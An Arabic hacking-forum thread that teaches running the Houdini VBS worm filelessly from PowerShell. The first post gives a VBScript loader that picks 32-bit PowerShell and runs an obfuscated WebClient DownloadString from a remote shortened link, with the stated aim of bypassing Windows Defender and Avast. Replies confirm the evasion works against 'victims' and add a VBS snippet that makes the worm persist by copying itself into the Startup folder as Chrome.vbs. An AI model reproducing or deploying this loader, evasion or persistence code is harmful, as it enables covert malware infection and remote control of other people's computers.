Execute HOUDINI worm on the fly from Powershell

تم تحميل الصفحة في 0,6221269 ثانية
Execute HOUDINI worm on the fly from Powershell
إنضم
7 يوليو 2016
المشاركات
248
الإعجابات
358
النقاط
63
الإقامة
JEDDAH City
السلام عليكم ورحمة الله وبركاته,

مبآرك عليكم شهر رمضان مقدما..

اليوم راح استخدم

MSScriptControl.ScriptControl

لتشغيل ملفات في بي اس أون فلاي

من خلال البور شل... ونتخطى الوندز دفندر والافاست( لم اجرب على غيرهم)

tutorial outline.....

1 - راح نعدل على الدوده.. لتشغيلها من البور شل

لابد من حذف Wscript من بعض السطور..

ومن ثم نحذف كود السليب ونحط كود اخر ليناسب البور شل ايضا.

2 - راح استبدل الـ White space ب نص. أي شي ببالك استخدمه

والهدف من ذلك جعل الملف بشكل عام كلين عشان لا يتمسك من الانتي فايرس لما نعمل
داون لود ستنرق بالبور شل.

3- نرفع الملف على لنك واستخدم الكود بالأسفل...


كود:
'============Checking the system architecture=========================================

Dim WshShell
Dim WshProcEnv
Dim process_architecture

Set WshShell =  CreateObject("WScript.Shell")
Set WshProcEnv = WshShell.Environment("Process")

process_architecture= WshProcEnv("PROCESSOR_ARCHITECTURE")

If process_architecture = "x86" Then   
    attack("Powershell")
Else   
    attack("C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe")
End If


'================Sub to execute our attack==================================

sub attack(S)

WshShell.Run S +" "+"-noexit  $vbs = New-Object -ComObject 'MSScriptControl.ScriptControl';$vbs.Language = 'VBScript';$text='(&(GCM *W-O*)Ne'+'t.We'+'bCl'+'ient).Dow'+'nloa'+'dSt'+'ring(''https://bit.ly/2DypL5i'').replace(''MmM'','' '')'|IEX;$vbs.Timeout=-1;$vbs.AddCode($text) ",0


end sub


الكود يبدأ بعمل تشك على النواه تبع الجهاز.. ومن ثم يختار ملف البور شل المناسب للتشغيل..

الهدف ملف بور شل نسخة 32 بت.. لان MSScriptControl.ScriptControl لا يعمل الا مع نسخة الـ 32 بت

بعد التشيك عالنواه يتم تنفيذ الاتاك تبعنا.. وانتهى.

تآبع الفيديو التطبيقي


 
إنضم
7 سبتمبر 2010
المشاركات
3,204
الإعجابات
1,608
النقاط
113
بعد الترجبه شغال تمام ويتخطى الدفيندر ويندوز 10

لكن للأسف ليس به تثبيت حتى اذا وضعت التثبيت عند انشاء السيرفر

مجرد عمل استارت الضحيه بتروح
 
إنضم
7 يوليو 2016
المشاركات
248
الإعجابات
358
النقاط
63
الإقامة
JEDDAH City
بعد الترجبه شغال تمام ويتخطى الدفيندر ويندوز 10

لكن للأسف ليس به تثبيت حتى اذا وضعت التثبيت عند انشاء السيرفر

مجرد عمل استارت الضحيه بتروح
أضف التثبيت بالسكربت اللي سويناه..

مش سكربت الدوده نفسه, لان سكربت الدوده بيشتغل on fly
 
إنضم
7 سبتمبر 2010
المشاركات
3,204
الإعجابات
1,608
النقاط
113
أضف التثبيت بالسكربت اللي سويناه..

مش سكربت الدوده نفسه, لان سكربت الدوده بيشتغل on fly
اريد كود تثبيت غير مكشوف اخى تثبيت ستارت اب او ريجسترى ممكن

انا جربت ده

لكن مكشوف
set startshe = wscript.createobject("wscript.shell")
set sysOb = createobject("scripting.filesystemobject")
startup = startshe.specialfolders ("startup") & "\Chrome.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
Dim dteWait
dteWait = DateAdd("s", 10, Now())
Do Until (Now() > dteWait)
Loop
 

Capony

Beginner Developer
rank
إنضم
2 يناير 2019
المشاركات
66
الإعجابات
54
النقاط
18
العمر
29
بعد الترجبه شغال تمام ويتخطى الدفيندر ويندوز 10

لكن للأسف ليس به تثبيت حتى اذا وضعت التثبيت عند انشاء السيرفر

مجرد عمل استارت الضحيه بتروح
ضع تثبيتك عند الدمج
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل